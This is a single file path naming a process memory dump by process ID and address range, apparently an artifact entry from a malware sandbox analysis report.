memory/3840-316-0x0000022E2D9A0000-0x0000022E2DA16000-memory.dmp